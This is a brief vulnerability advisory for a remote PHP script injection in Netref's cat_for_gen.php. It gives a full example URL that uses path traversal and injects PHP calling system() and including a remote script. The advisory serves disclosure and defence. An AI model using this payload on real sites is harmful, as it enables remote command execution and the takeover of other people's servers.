Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability

Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability

No exploit is required to leverage this issue. The following example is available:
http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>